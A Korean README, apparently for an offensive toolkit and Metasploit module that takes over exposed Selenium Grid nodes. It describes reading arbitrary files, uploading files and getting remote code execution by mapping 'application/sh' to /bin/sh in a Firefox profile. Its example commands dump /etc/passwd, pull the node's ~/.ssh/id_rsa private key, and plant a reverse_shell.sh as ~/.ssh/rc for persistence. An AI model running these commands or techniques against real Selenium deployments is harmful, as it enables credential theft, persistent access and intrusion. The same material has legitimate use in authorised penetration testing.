
셀레늄 노드 탈취에 도움이 될 수 있는 셀레늄 테스트 모음
이 프로젝트는 다른 곳으로 이동했습니다. 최신 버전을 받으려면 https://codeberg.org/JonStratton/selenium-node-takeover-kit 에서 pull 하세요.
이것은 아래 예제 중 일부를 결합하여 Selenium 노드에 파일을 업로드하고, 노드에서 파일을 다운로드하고, 노드에서 코드를 실행합니다(“COMMAND_TYPE” 매개변수 사용). RCE는 현재 Linux에서만 작동합니다. 설치하려면 이 파일을 "~/.msf4/modules/exploits/multi/http/" 또는 아무 곳에나 복사하세요.
이것은 단순히 "file:" URL로 이동하여 페이지 내용을 덤프합니다.
examples/selenium_node_cat.py -h http://selenium-hub.lan:4444/wd/hub -r /etc/passwd이것은 인라인 HTML을 사용하여 파일 업로드 입력란이 있는 인라인 양식을 생성합니다. 그런 다음 로컬 파일 경로를 이 양식에 전송합니다. 이 양식의 자바스크립트는 base64로 인코딩된 파일을 같은 페이지에 포함시킵니다. 그런 다음 스크립트가 이를 읽고 디코딩하여 로컬 파일로 저장합니다.
examples/selenium_node_download.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/id_rsa -l ./nodes_rsa노드 다운로드 스크립트와 유사하지만 자바스크립트에서 파일을 처리하지 않습니다. 파일이 존재하지 않으면 스크립트의 send_keys()가 예외를 발생시킵니다.
Firefox 전용입니다. Selenium API 호출에 포함된 base64 인코딩 zip 파일인 Firefox 프로필을 사용하여 사용자 지정 처리기(이 경우 “application/sh”를 /bin/sh로)를 만듭니다. 그런 다음 일부 셸 명령을 base64로 인코딩하고 인라인 “data:”를 사용하여 “application/sh”와 연결된 명령을 전달합니다. 그러면 Firefox가 명령이 포함된 임시 파일을 만들고 sh로 실행합니다.
Firefox 전용입니다. Firefox 프로필을 사용하여 사용자 지정 다운로드 디렉터리를 설정하고 "다른 이름으로 저장" 프롬프트를 끕니다. 그런 다음 업로드할 인코딩된 파일인 "data:" 링크가 포함된 인라인 HTML로 이동합니다. 그런 다음 이 링크를 클릭합니다.
examples/selenium_node_upload.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/rc -l ./reverse_shell.shFirefox 전용입니다. 안전하게 압축 해제되지 않는 Filefox 프로필을 사용하여 노드의 파일 시스템에 파일을 씁니다.